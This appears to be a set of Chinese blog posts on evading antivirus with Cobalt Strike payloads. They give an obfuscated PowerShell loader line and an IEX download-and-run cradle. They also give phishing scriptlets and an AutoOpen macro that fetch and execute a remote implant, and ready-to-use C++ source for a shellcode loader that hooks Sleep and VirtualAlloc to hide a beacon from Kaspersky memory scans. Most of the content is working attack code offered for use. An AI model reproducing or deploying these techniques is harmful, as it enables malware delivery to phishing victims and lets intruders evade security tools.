PowerShell免杀

前言

明天早八算什么,话不多说,开整。
相比起PE文件,直接用分割语句的方式,定位查杀点,不难发现,不论是WD,360,火绒,查杀点都定位在

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))

这一语上,那么我们只要把这个混淆了不就搞定了

ps1 免杀

直接把这句提出来,单独保存为一个ps1,直接使用开源项目Invoke-Obfuscation
之后,直接使用

Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation
SET SCRIPTBLOCK script_block_or_command
set scriptpath 单独提取出来的ps1地址
encoding\1

无标题.png
之后直接把上面的语句,替换成

$var_va = .(([stRInG]$vERbosePREfEReNCE)[1,3]+'x'-JoIN'')(( ('5b', 53, 79,73, 74 , 65 ,'6d' , '2e',52 ,75 , '6e' , 74, 69, '6d' , 65,'2e' , 49 , '6e', 74 ,65 , 72, '6f',70 , 53 ,65, 72, 76, 69 , 63 ,65 ,73, '2e','4d' , 61 ,72 , 73 , 68,61 ,'6c' ,'5d', '3a','3a' ,47 ,65, 74 ,44 ,65 , '6c' ,65,67,61 ,74, 65, 46 , '6f' ,72 , 46, 75,'6e',63, 74, 69, '6f' , '6e' , 50 , '6f' ,69,'6e' , 74 ,65, 72, 28 , 28 ,66, 75,'6e',63,'5f',67, 65 ,74,'5f',70,72, '6f' ,63, '5f' ,61, 64,64, 72 ,65, 73,73,20 , '6b', 65, 72 ,'6e' , 65 , '6c',33 , 32,'2e' , 64 , '6c' , '6c' ,20 , 56,69 ,72 ,74 , 75 , 61,'6c',41,'6c' ,'6c' , '6f',63,29 ,'2c' ,20, 28 , 66 , 75,'6e', 63,'5f', 67 , 65,74 , '5f' ,64 ,65, '6c' , 65, 67,61,74,65,'5f', 74 ,79 ,70 ,65 ,20 , 40 ,28,'5b', 49,'6e',74, 50, 74, 72 , '5d' ,'2c' , 20, '5b',55,49 , '6e', 74 , 33,32, '5d','2c' , 20, '5b',55,49,'6e' ,74, 33,32, '5d','2c' , 20 , '5b', 55 , 49 ,'6e' , 74,33,32,'5d' ,29 ,20 , 28 , '5b',49 ,'6e' ,74 ,50, 74 ,72,'5d',29 ,29, 29)| fOreach-oBjEct{( [cOnVeRT]::tOInT16(( $_.TOSTrinG() ) , 16) -aS [CHar]) } ) -joIN '')

photo_2021-04-22_02-01-19.jpg
huorong.jpg
360.jpg

之后精简语句,直接用网络上的远程下载执行

IEX (New-Object Net.WebClient).(((New-Object Net.WebClient).P
sObject.Methods | Where-Object {$_.Name -like '*own*d*ing'}).Name).Invoke("http:
///ps1.txt")

把上面的powershell放上云就行

powershell command

明天找机会写

Tags: none

文档钓鱼-宏免杀上线

前言

突然要研究,没啥技术含量
photo_2021-04-16_23-59-49.jpg

使用

远程部署一个sct

<?XML version="1.0"?>
<scriptlet>
<registration
  progid="TESTING"
  classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
  <script language="JScript">
    <![CDATA[
      var foo = new ActiveXObject("WScript.Shell").Run("powershell的cs马");
    ]]>
</script>
</registration>
</scriptlet>

这个只能过360,我也不知道为啥它不拦,但是总之他就是不拦截。。。
以及过其他的。

<?XML version="1.0"?>
<scriptlet>
<registration
  progid="TESTING"
  classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
  <script language="JScript">
    <![CDATA[
        var WSHShell = new ActiveXObject("WScript.Shell");
path = WSHShell.ExpandEnvironmentStrings("%temp%");
var filepath = path+"/asdqq";
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
xhr.open("GET","你的免杀马", false);
xhr.send();
if (xhr.Status == 200) {
        var fso = new ActiveXObject("Scripting.FileSystemObject");
        var stream = new ActiveXObject("ADODB.Stream");
        stream.Open();
        stream.Type = 1;
        stream.Write(xhr.ResponseBody);
        stream.Position = 0;
    if (fso.FileExists(filepath)){
       fso.DeleteFile(filepath);
    }
        stream.SaveToFile(filepath);
        stream.Close();
        new ActiveXObject("WScript.Shell").Exec(filepath);
}
    ]]>
</script>
</registration>
</scriptlet>

用上面这个方法,目标开了宏就能过了。

直接给宏添加

Private Declare Function DllInstall Lib "scrobj.dll" (ByVal bInstall As Boolean, ByRef pszCmdLine As Any) As Long

Sub AutoOpen()
    DllInstall False, ByVal StrPtr("你的远程sct地址") ' False = "Don't install"
End Sub
Tags: 免杀, cs,

cs bypass卡巴斯基内存查杀--BIE实现

前言

WBG大佬的的实现:cs bypass卡巴斯基内存查杀 跟风yansu大佬.pdf
yansu大佬的文章:记一次cs bypass卡巴斯基内存查杀

大佬们思路都骚的丫批,我就不献丑直接上代码了,原理和WBG大佬的一模一样,只不过自己实现了hook api,开箱即用

#include<windows.h>
#include<stdio.h>

static LPVOID(WINAPI* OldVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD
    flAllocationType, DWORD flProtect) = VirtualAlloc;

static VOID(WINAPI* OldSleep)(DWORD dwMilliseconds) = Sleep;

LPVOID Beacon_address = NULL;
DWORD Beacon_data_len;
bool Vir_FLAG;

struct APIHeader {
#ifdef _WIN64
    char buff[12];
#else
    char buff[5];
#endif
    int size;
};

APIHeader Sleep_Header;
APIHeader VirtualAlloc_Header;
DWORD Beacon_Memory_address_flOldProtect;
BOOL IgnoreFirst = false;


HANDLE hEvent = CreateEvent(NULL, TRUE, false, NULL);
LONG NTAPI FirstVectExcepHandler(PEXCEPTION_POINTERS pExcepInfo)
{

    printf("FirstVectExcepHandler\n");
    printf("异常错误码:%x\n", pExcepInfo->ExceptionRecord->ExceptionCode);
    //printf("线程地址:%llx\n", pExcepInfo->ContextRecord->Rip);

    if (pExcepInfo->ExceptionRecord->ExceptionCode == 0xc0000005)
    {
        printf("恢复Beacon内存属性\n");
        VirtualProtect(Beacon_address, Beacon_data_len, PAGE_EXECUTE_READWRITE,
            &Beacon_Memory_address_flOldProtect);
        return EXCEPTION_CONTINUE_EXECUTION;
    }
    return EXCEPTION_CONTINUE_SEARCH;
}

DWORD WINAPI Beacon_set_Memory_attributes(LPVOID lpParameter)
{
    printf("Beacon_set_Memory_attributes启动\n");
    while (true)
    {
        WaitForSingleObject(hEvent, INFINITE);
        printf("设置Beacon内存属性不可执行\n");
        VirtualProtect(Beacon_address, Beacon_data_len, PAGE_READWRITE,
            &Beacon_Memory_address_flOldProtect);
        ResetEvent(hEvent);
    }
    return 0;
}



BOOL HookApi(LPCSTR Moudle, LPCSTR Function, LPVOID NewFunction, APIHeader* api)
{
    // 获取 user32.dll 模块加载基址
    HMODULE hDll = GetModuleHandleA(Moudle);
    if (NULL == hDll)
    {
        return FALSE;
    }
    // 获取 MessageBoxA 函数的导出地址
    PVOID OldFunction = GetProcAddress(hDll, Function);
    if (NULL == OldFunction)
    {
        return FALSE;
    }
    // 计算写入的前几字节数据, 32位下5字节, 64位下12字节
#ifndef _WIN64
    // 32位
    // 汇编代码:jmp _dwNewAddress
    // 机器码位:e9 _dwOffset(跳转偏移)
    //        addr1 --> jmp _dwNewAddress指令的下一条指令的地址,即eip的值
    //        addr2 --> 跳转地址的值,即_dwNewAddress的值
    //        跳转偏移 _dwOffset = addr2 - addr1
    BYTE pNewData[5] = { 0xe9, 0, 0, 0, 0 };
    DWORD dwNewDataSize = 5;
    DWORD dwOffset = 0;
    // 计算跳转偏移
    dwOffset = ((DWORD)NewFunction) - (DWORD)OldFunction;
    printf("raw:%x offset:%x\n", NewFunction, dwOffset);
    RtlCopyMemory(&pNewData[1], &dwOffset, sizeof(dwOffset));
#else
    // 64位
    // 汇编代码:mov rax, _dwNewAddress(0x1122334455667788)
    //         jmp rax
    // 机器码是:
    //    48 b8 _dwNewAddress(0x1122334455667788)
    //    ff e0
    BYTE pNewData[12] = { 0x48, 0xb8, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xe0 };
    DWORD dwNewDataSize = 12;
    api->size = dwNewDataSize;
    ULONGLONG ullNewFuncAddr = (ULONGLONG)NewFunction;
    RtlCopyMemory(&pNewData[2], &ullNewFuncAddr, sizeof(ullNewFuncAddr));
#endif
    // 设置页面的保护属性为 可读、可写、可执行
    DWORD dwOldProtect = 0;
    VirtualProtect(OldFunction, dwNewDataSize, PAGE_EXECUTE_READWRITE, &dwOldProtect);
    // 保存原始数据
    RtlCopyMemory(api->buff, OldFunction, dwNewDataSize);
    //printf("address:%llx\n", OldFunction);
    RtlCopyMemory(OldFunction, pNewData, dwNewDataSize);
    // 还原页面保护属性
    VirtualProtect(OldFunction, dwNewDataSize, dwOldProtect, &dwOldProtect);
    return TRUE;
}
BOOL UnhookApi(LPCSTR Moudle, LPCSTR Function, APIHeader* api)
{
    // 获取 user32.dll 模块加载基址
    HMODULE hDll = GetModuleHandleA(Moudle);
    if (NULL == hDll)
    {
        return FALSE;
    }
    // 获取 MessageBoxA 函数的导出地址
    PVOID OldFunction = GetProcAddress(hDll, Function);
    if (NULL == OldFunction)
    {
        return FALSE;
    }
    // 计算写入的前几字节数据, 32位下5字节, 64位下12字节
#ifndef _WIN64
    DWORD dwNewDataSize = 5;
#else
    DWORD dwNewDataSize = 12;
#endif
    // 设置页面的保护属性为 可读、可写、可执行
    DWORD dwOldProtect = 0;
    VirtualProtect(OldFunction, dwNewDataSize, PAGE_EXECUTE_READWRITE, &dwOldProtect);
    // 恢复数据
    RtlCopyMemory(OldFunction, api->buff, dwNewDataSize);
    // 还原页面保护属性
    VirtualProtect(OldFunction, dwNewDataSize, dwOldProtect, &dwOldProtect);
    return TRUE;
}
typedef void(__stdcall* CODE) ();
void WINAPI NewSleep(DWORD dwMilliseconds)
{

    printf("sleep时间:%d\n", dwMilliseconds);
    UnhookApi("kernel32.dll", "Sleep", &Sleep_Header);
    if (Beacon_address) {
        VirtualFree(Beacon_address, Beacon_data_len, MEM_RELEASE);
    }
    SetEvent(hEvent);
    OldSleep(dwMilliseconds);
    HookApi("kernel32.dll", "Sleep", &NewSleep, &Sleep_Header);
}
LPVOID WINAPI NewVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD  flAllocationType, DWORD flProtect) {

    UnhookApi("kernel32.dll", "VirtualAlloc", &VirtualAlloc_Header);
    Beacon_data_len = dwSize;
    Beacon_address = OldVirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect);
    //HookApi("kernel32.dll", "VirtualAlloc", &NewVirtualAlloc, &VirtualAlloc_Header);
    printf("分配大小:%d\t", Beacon_data_len);
    printf("分配地址:%llx \n", Beacon_address);

    return Beacon_address;

}
DWORD ReadFileData(char* szFilePath, char* pBuf)
{
    DWORD dwBytesRead;
    HANDLE hFile;

    hFile = CreateFileA(szFilePath, GENERIC_READ, FILE_SHARE_READ, NULL,
        OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    if (hFile == INVALID_HANDLE_VALUE)
    {
        return 0;
    }

    DWORD dwFileSize = GetFileSize(hFile, 0);
    if (dwFileSize == 0)
    {
        CloseHandle(hFile);
        return 0;
    }

    ReadFile(hFile, pBuf, dwFileSize, &dwBytesRead, NULL);
    CloseHandle(hFile);
    return dwFileSize;
}
DWORD GetFileSizeLen(char* szSource)
{

    HANDLE hFile;

    hFile = CreateFileA(szSource, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    if (hFile == INVALID_HANDLE_VALUE)
    {
        MessageBoxA(NULL, "文件未找到!", NULL, NULL);
        return 0;
    }

    DWORD dwFileSize = GetFileSize(hFile, 0);
    if (dwFileSize == 0)
    {
        MessageBoxA(NULL, "文件长度为零!", NULL, NULL);
        CloseHandle(hFile);
        return 0;
    }
    CloseHandle(hFile);
    return dwFileSize;
}

int main()
{

    AddVectoredExceptionHandler(1, &FirstVectExcepHandler);
    HANDLE hThread1 = CreateThread(NULL, 0, Beacon_set_Memory_attributes, NULL, 0,
        NULL);

    char shelname[] = "beacon.bin";
    DWORD filelen = GetFileSizeLen(shelname);
    char* filebuf = new char[filelen];
    ReadFileData(shelname, filebuf);
    PVOID p = NULL;
    if ((p = VirtualAlloc(NULL, filelen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)
        MessageBoxA(NULL, "申请内存失败", "提醒", MB_OK);
    if (!(memcpy(p, filebuf, filelen)))
        MessageBoxA(NULL, "写内存失败", "提醒", MB_OK);
    HookApi("kernel32.dll", "Sleep", &NewSleep, &Sleep_Header);
    HookApi("kernel32.dll", "VirtualAlloc", &NewVirtualAlloc, &VirtualAlloc_Header);
    CODE code = (CODE)p;

    code();
    CloseHandle(hThread1);

}

根据wbg大佬的指点,beacon.bin必须是cs生成无阶段木马的raw,不能用分阶段或者直接生成shellcode。

Tags: 免杀, cs